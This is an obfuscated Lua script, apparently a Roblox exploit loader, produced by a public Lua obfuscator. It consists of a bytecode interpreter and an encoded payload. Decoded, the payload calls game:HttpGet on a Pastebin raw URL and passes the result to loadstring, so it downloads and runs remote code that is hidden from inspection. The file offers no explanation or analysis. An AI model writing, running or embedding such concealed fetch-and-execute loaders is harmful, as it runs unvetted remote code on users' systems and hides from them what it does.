--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=1;local v28;v17=v5(v4(v17,5),"..",function(v29)if (v2(v29,2)==79) then local v78=0;while true do if (v78==0) then v28=v1(v4(v29,1,1));return "";end end else local v79=0;local v80;while true do if (v79==0) then v80=v3(v1(v29,16));if v28 then local v113=0;local v114;while true do if (v113==0) then v114=v6(v80,v28);v28=nil;v113=1;end if (v113==1) then return v114;end end else return v80;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v81=(v31/(2^(v32-(1373 -(656 + 716)))))%((6 -4)^(((v33-(1 + 0)) -(v32-((1255 -(449 + 805)) + 0))) + 1 + 0)) ;return v81-(v81%(3 -2)) ;else local v82=(3 -1)^(v32-(1769 -(1554 + (1581 -(173 + 1194))))) ;return (((v31%(v82 + v82))>=v82) and (2 -1)) or ((265 + 324) -(360 + 229)) ;end end local function v34()local v47=v2(v17,v27,v27);v27=v27 + 1 ;return v47;end local function v35()local v48=0 -0 ;local v49;local v50;while true do if ((503 -(420 + 82))==v48) then return (v50 * (1272 -1016)) + v49 ;end if (v48==(0 + 0)) then v49,v50=v2(v17,v27,v27 + (197 -(42 + 153)) );v27=v27 + 2 + (0 -0) ;v48=1 + 0 ;end end end local function v36()local v51=0 + 0 ;local v52;local v53;local v54;local v55;while true do if ((0 + 0)==v51) then v52,v53,v54,v55=v2(v17,v27,v27 + (7 -4) );v27=v27 + (15 -(9 + 2)) ;v51=1 + 0 ;end if ((1275 -(67 + 1207))==v51) then return (v55 * ((11521595 -(1228 + 649)) + 5257498)) + (v54 * (67237 -(205 + (2350 -854)))) + (v53 * (656 -400)) + v52 ;end end end local function v37()local v56=v36();local v57=v36();local v58=1;local v59=(v30(v57,1 + 0 ,1323 -((2211 -(1566 + 54)) + 712) ) * (((1730 -425) -(805 + 498))^32)) + v56 ;local v60=v30(v57,(61 -20) -20 ,92 -61 );local v61=((v30(v57,32)==((3112 -(833 + 303)) -(213 + (3296 -(134 + 1400))))) and  -(1 + 0)) or (3 -2) ;if (v60==(0 -(0 + 0))) then if (v59==(0 + 0)) then return v61 * (0 + 0) ;else local v90=0 -0 ;while true do if (v90==((0 -0) + 0)) then v60=1;v58=(0 -0) -(0 + 0) ;break;end end end elseif (v60==(5551 -3504)) then return ((v59==0) and (v61 * ((622 -(226 + 395))/(429 -(263 + (412 -246)))))) or (v61 * NaN) ;end return v9(v61,v60-1023 ) * (v58 + (v59/((2 + 0)^(84 -(7 + 25))))) ;end local function v38(v39)local v62;if  not v39 then local v83=0 + (0 -0) ;while true do if (v83==(1911 -(191 + 1720))) then v39=v36();if (v39==(870 -((797 -(31 + 55)) + 159))) then return "";end break;end end end v62=v4(v17,v27,(v27 + v39) -1 );v27=v27 + v39 ;local v63={};for v76=1 + 0 , #v62 do v63[v76]=v3(v2(v4(v62,v76,v76)));end return v7(v63);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v64=1095 -(24 + 1071) ;local v65;local v66;local v67;local v68;local v69;local v70;local v71;while true do if (v64==(0 -0)) then local v84=0 + 0 ;while true do if (v84==(1 + 0)) then v64=1411 -(756 + 654) ;break;end if (v84==(0 + 0)) then v65=0 + 0 ;v66=nil;v84=1;end end end if (v64~=(1 + 0)) then else local v85=1764 -(1227 + 537) ;while true do if (v85==(0 -0)) then v67=nil;v68=nil;v85=1;end if ((4 -3)~=v85) then else v64=1 + 1 ;break;end end end if (v64==2) then local v86=0;while true do if (v86~=(851 -(505 + 345))) then else v64=1 + 2 ;break;end if (v86==(108 -(72 + 36))) then v69=nil;v70=nil;v86=1;end end end if (v64==(2 + 1)) then v71=nil;while true do local v91=0 -0 ;while true do if (v91==1) then if (v65==(0 -0)) then local v119=0 + 0 ;local v120;while true do if (v119~=0) then else v120=0 -0 ;while true do if ((510 -(130 + 379))==v120) then local v138=0 -0 ;while true do if ((3 -2)==v138) then v120=5 -3 ;break;end if (v138~=0) then else v68={};v69={v66,v67,nil,v68};v138=1 + 0 ;end end end if (v120~=(1506 -(1085 + 419))) then else v65=1 + 0 ;break;end if ((0 -0)==v120) then v66={};v67={};v120=1259 -(656 + 602) ;end end break;end end end break;end if ((20 -(6 + 14))~=v91) then else if (1~=v65) then else local v121=0 -0 ;while true do if (v121==(0 + 0)) then v70=v36();v71={};v121=1;end if (v121==(1515 -(351 + 1162))) then v65=601 -(58 + 541) ;break;end if (v121~=1) then else for v131=1 -0 ,v70 do local v132=0 -0 ;local v133;local v134;local v135;local v136;while true do if (v132~=(0 + 0)) then else v133=0 + 0 ;v134=nil;v132=1 + 0 ;end if (v132~=(494 -(452 + 40))) then else while true do if (v133==(0 + 0)) then local v147=1770 -(132 + 1638) ;while true do if (v147==1) then v133=1 -0 ;break;end if (v147==0) then v134=1659 -(159 + 1500) ;v135=nil;v147=1;end end end if (v133~=1) then else v136=nil;while true do if (v134==(0 + 0)) then local v167=0 -0 ;local v168;while true do if (v167==(406 -(109 + 297))) then v168=0 + 0 ;while true do if (v168==(1 + 0)) then v134=1 + 0 ;break;end if (v168~=(536 -(477 + 59))) then else local v183=0 + 0 ;local v184;while true do if (v183==(613 -(220 + 393))) then v184=0 -0 ;while true do if (v184~=0) then else local v203=1509 -(725 + 784) ;while true do if ((1 + 0)~=v203) then else v184=1;break;end if ((1494 -(785 + 709))==v203) then v135=v34();v136=nil;v203=1 + 0 ;end end end if (v184~=(2 -1)) then else v168=1 -0 ;break;end end break;end end end end break;end end end if (v134~=(1 + 0)) then else if (v135==(1 + 0)) then v136=v34()~=0 ;elseif (v135==(1 + 1)) then v136=v37();elseif (v135==(908 -(143 + 762))) then v136=v38();end v71[v131]=v136;break;end end break;end end break;end if (v132==1) then v135=nil;v136=nil;v132=1 + 1 ;end end end v69[7 -4 ]=v34();v121=2;end end end if (v65==(5 -3)) then for v122=1 -0 ,v36() do local v123=0 -0 ;local v124;local v125;while true do if (v123==(0 -0)) then local v137=0;while true do if (v137==(1 -0)) then v123=2 -1 ;break;end if (v137~=0) then else v124=1904 -(1851 + 53) ;v125=nil;v137=1063 -(728 + 334) ;end end end if (v123==(1064 -(716 + 347))) then while true do if (v124==(0 + 0)) then v125=v34();if (v30(v125,2 -1 ,1 + 0 )~=(1354 -(582 + 772))) then else local v141=0;local v142;local v143;local v144;local v145;local v146;while true do if (v141~=(1 + 1)) then else v146=nil;while true do if (v142==(2 -0)) then while true do if (v143==0) then local v174=359 -(26 + 333) ;local v175;while true do if (v174~=(1716 -(1325 + 391))) then else v175=0 + 0 ;while true do if (v175~=(1657 -(23 + 1633))) then else v143=2 -1 ;break;end if (v175~=(0 + 0)) then else local v202=118 -(60 + 58) ;while true do if (v202==1) then v175=2 -1 ;break;end if (v202~=(1767 -(896 + 871))) then else v144=v30(v125,1936 -(956 + 978) ,3);v145=v30(v125,4,1882 -(1336 + 540) );v202=1 + 0 ;end end end end break;end end end if (v143~=(703 -(517 + 183))) then else if (v30(v145,3,3)~=1) then else v146[1939 -(1407 + 528) ]=v71[v146[776 -(164 + 608) ]];end v66[v122]=v146;break;end if (v143==(1 + 0)) then local v177=0;while true do if (v177~=(1538 -(665 + 873))) then else v146={v35(),v35(),nil,nil};if (v144==(1445 -(1405 + 40))) then local v196=0 -0 ;local v197;while true do if (v196==0) then v197=0 + 0 ;while true do if (v197~=(0 -0)) then else v146[3]=v35();v146[2 + 2 ]=v35();break;end end break;end end elseif (v144==(4 -3)) then v146[3]=v36();elseif (v144==(795 -(714 + 79))) then v146[11 -8 ]=v36() -((801 -(382 + 417))^(328 -(245 + 67))) ;elseif (v144==(1696 -(899 + 794))) then local v210=1219 -(398 + 821) ;local v211;local v212;while true do if (v210==(1488 -(1050 + 438))) then v211=0 + 0 ;v212=nil;v210=1;end if (v210~=1) then else while true do if ((0 + 0)==v211) then v212=0;while true do if (v212==(0 -0)) then v146[1506 -(1408 + 95) ]=v36() -(2^(46 -30)) ;v146[2 + 2 ]=v35();break;end end break;end end break;end end end v177=1;end if (v177==(1 + 0)) then v143=2;break;end end end if (v143~=(1 + 1)) then else local v178=0 -0 ;while true do if (v178==1) then v143=3;break;end if (v178~=(1149 -(314 + 835))) then else if (v30(v145,1,745 -(658 + 86) )~=(1 -0)) then else v146[1 + 1 ]=v71[v146[5 -3 ]];end if (v30(v145,2 -0 ,2)==1) then v146[9 -6 ]=v71[v146[1049 -(1032 + 14) ]];end v178=1;end end end end break;end if (v142==(996 -(289 + 706))) then v145=nil;v146=nil;v142=2 + 0 ;end if (v142~=(719 -(526 + 193))) then else local v170=277 -(212 + 65) ;while true do if (1==v170) then v142=1;break;end if (v170==0) then v143=1908 -(1619 + 289) ;v144=nil;v170=1 + 0 ;end end end end break;end if (v141~=(563 -(130 + 432))) then else v144=nil;v145=nil;v141=1 + 1 ;end if (v141==(0 -0)) then v142=0 -0 ;v143=nil;v141=1 + 0 ;end end end break;end end break;end end end for v126=1 + 0 ,v36() do v67[v126-1 ]=v42();end for v128=1,v36() do v68[v128]=v36();end return v69;end v91=2 -1 ;end end end break;end end end local function v43(v44,v45,v46)local v72=0;local v73;local v74;local v75;while true do if (v72==0) then v73=v44[1];v74=v44[2];v72=1;end if (v72==1) then v75=v44[3];return function(...)local v92=1;local v93= -1;local v94={...};local v95=v13("#",...) -1 ;local function v96()local v97=v73;local v98=v74;local v99=v75;local v100=v41;local v101={};local v102={};local v103={};for v107=0 -0 ,v95 do if (((33 + 105)<3675) and (v107>=v99)) then v101[v107-v99 ]=v94[v107 + (1 -0) ];else v103[v107]=v94[v107 + (853 -(469 + 383)) ];end end local v104=(v95-v99) + 1 + 0 ;local v105;local v106;while true do local v108=0;local v109;local v110;while true do if (((4395 -2358)<=(9800 -6306)) and (v108==(1 + 0))) then while true do if (((3026 + 1479)>3445) and (v109==0)) then v110=0 + 0 ;while true do if (((57 + 34)<(1171 + 1154)) and (v110==(1 -0))) then if ((v106<=2) or ((2250 -1759)==(1799 -(414 + 140)))) then if ((v106<=(0 -0)) or ((4887 -(1478 + 304))<1194)) then local v148=1597 -((501 -165) + 1261) ;local v149;local v150;local v151;local v152;while true do if (((120 + 2623)>(3761 -(876 + 628))) and (0==v148)) then v149=0;v150=nil;v148=(2134 -(260 + 1554)) -(225 + 94) ;end if ((3901==(4081 -(133 + 47))) and (v148==1)) then v151=nil;v152=nil;v148=1552 -(983 + 567) ;end if ((v148==2) or ((582 + 1557)>=(6307 -(724 + 563 + 696)))) then while true do if ((4767>(42 -18)) and (v149==(1288 -(715 + 572)))) then v152=nil;while true do if ((v150==(0 -0)) or ((4495 -(640 + 112))==(3475 -(3300 -(361 + 635))))) then local v185=0 -0 ;while true do if ((v185==(1 + 0)) or (4211==(323 + 2034))) then v150=1 -0 ;break;end if ((v185==(0 -0)) or ((2301 -(234 + 438))<=203)) then local v193=0 + (0 -0) ;while true do if ((v193==(2 -1)) or ((4373 -(2443 + 645))>3138)) then v185=3 -(1833 -(1329 + 502)) ;break;end if ((v193==0) or ((1857 + 650)>(4854 -(684 + 124)))) then v151=v105[(2456 -(333 + 595)) -(355 + 1171) ];v152=v103[v105[5 -2 ]];v193=1 -0 ;end end end end end if (((2311 + 1626)>=(3703 -2236)) and (v150==((1931 -(1146 + 782)) -2))) then v103[v151 + (1943 -(1015 + 927)) + (0 -0) ]=v152;v103[v151]=v152[v105[6 -2 ]];break;end end break;end if ((0==v149) or ((3664 -2042)==(5464 -(673 + 1154)))) then local v173=0;while true do if ((v173==(3 -2)) or ((6949 -4617)<=(1059 + 403))) then v149=1;break;end if (((36 + 853)<(14053 -9573)) and ((810 -(327 + 483))==v173)) then v150=0;v151=nil;v173=1;end end end end break;end end elseif ((v106>1) or ((3228 + 663)<2075)) then local v153=799 -(705 + (160 -66)) ;local v154;local v155;local v156;local v157;local v158;while true do if ((v153==(0 -0)) or ((2869 + 1703)<=(431 + 3412))) then v154=0 + 0 ;v155=nil;v153=1429 -(846 + 582) ;end if ((v153==(9 -(11 -4))) or (1795>(15532 -11068))) then v158=nil;while true do if ((3087>(207 -40)) and (v154==(1 + 0))) then local v179=1239 -(801 + (583 -145)) ;while true do if ((v179==(3 -2)) or (((50035 -37976) -7097)<=(7297 -4796))) then v154=(1800 -975) -(309 + 514) ;break;end if ((4598>=(1357 -(62 + 44))) and ((1340 -(518 + 822))==v179)) then v93=(v157 + v155) -(1 + 0) ;v158=0 -0 ;v179=1678 -(1189 + (2123 -1635)) ;end end end if (((260 -139)==(1426 -(1040 + 98 + 167))) and ((2 + 0)==v154)) then for v189=v155,v93 do local v190=0;while true do if ((v190==(0 -0)) or ((1518 -267)<(1722 -723))) then v158=v158 + 1 ;v103[v189]=v156[v158];break;end end end break;end if ((v154==(1141 -(561 + 580))) or ((2070 -(6 + 924))<=1105)) then v155=v105[631 -(10 + 619) ];v156,v157=v100(v103[v155](v14(v103,v155 + 1 + 0 ,v105[3 + 0 ])));v154=1;end end break;end if ((v153==(1 + 0)) or (71>(2149 -(559 + 703)))) then v156=nil;v157=nil;v153=77 -((2042 -(482 + 1515)) + 30) ;end end else do return;end end elseif (((1584 + 934)>(279 + 1364)) and (v106<=((2 -1) + 3))) then if ((v106>(896 -(75 + 818))) or (1164<(823 -509))) then v103[v105[2]]=v46[v105[3 + 0 ]];else v103[v105[1 + 1 ]]=v105[3 -0 ];end elseif (((2495 + 2213)>=(690 + 1581)) and (v106==(5 + 0))) then local v163=0;local v164;local v165;while true do if (((7767 -(25760 -20150))<=(4997 -(176 + 658))) and (v163==(3 -2))) then while true do if ((v164==(1445 -(314 + 1131))) or ((7 + 86 + 127)>=(3555 -(43 + 98)))) then v165=v105[2 + (0 -0) ];v103[v165]=v103[v165](v14(v103,v165 + (1309 -(371 + 937)) ,v93));break;end end break;end if ((v163==(0 + 0)) or ((741 + 1650)<(3372 -(672 + 1064)))) then v164=0;v165=nil;v163=1 + 0 ;end end else v103[v105[2 + 0 ]]();end v92=v92 + ((106 + 1494) -(213 + 1386)) ;break;end if ((0==v110) or ((5465 -(162 + 1276))<(602 + 2050 + 303))) then local v139=0 -0 ;local v140;while true do if (((3133 -2413)<=2283) and (v139==(0 + 0))) then v140=0 -0 ;while true do if (((1877 -(302 + 1574))==v140) or ((4783 -(39 + (354 -257)))<((985 + 761) -1032))) then v110=1 + 0 ;break;end if ((((10349 -5934) -(159 + 70))<(7874 -2914)) and (v140==((0 + 0) -0))) then local v166=1652 -(1357 + 288 + 7) ;while true do if ((649<=(3931 -(50 + 20))) and (v166==0)) then v105=v97[v92];v106=v105[181 -(110 + 70) ];v166=1724 -(653 + 1070) ;end if (((5614 -(158 + 915))>=(851 + 392)) and (v166==(134 -(81 + 52)))) then v140=563 -((760 -515) + 317) ;break;end end end end break;end end end end break;end end break;end if (((4217 -(399 + 1024))<=((6625 -(1720 + 51)) -(507 + 708))) and (v108==(0 -0))) then v109=0 -0 ;v110=nil;v108=1 + 0 ;end end end end A,B=v41(v12(v96));if  not A[1] then local v111=0;local v112;while true do if (0==v111) then v112=v44[4][v92] or "?" ;error("Script error at ["   .. v112   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end end end return v43(v42(),{},v18)(...);end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F6E474864576B755600083O0012043O00013O001204000100023O00202O000100010003001203000300044O0002000100034O00055O00022O00063O000100012O00013O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end end end
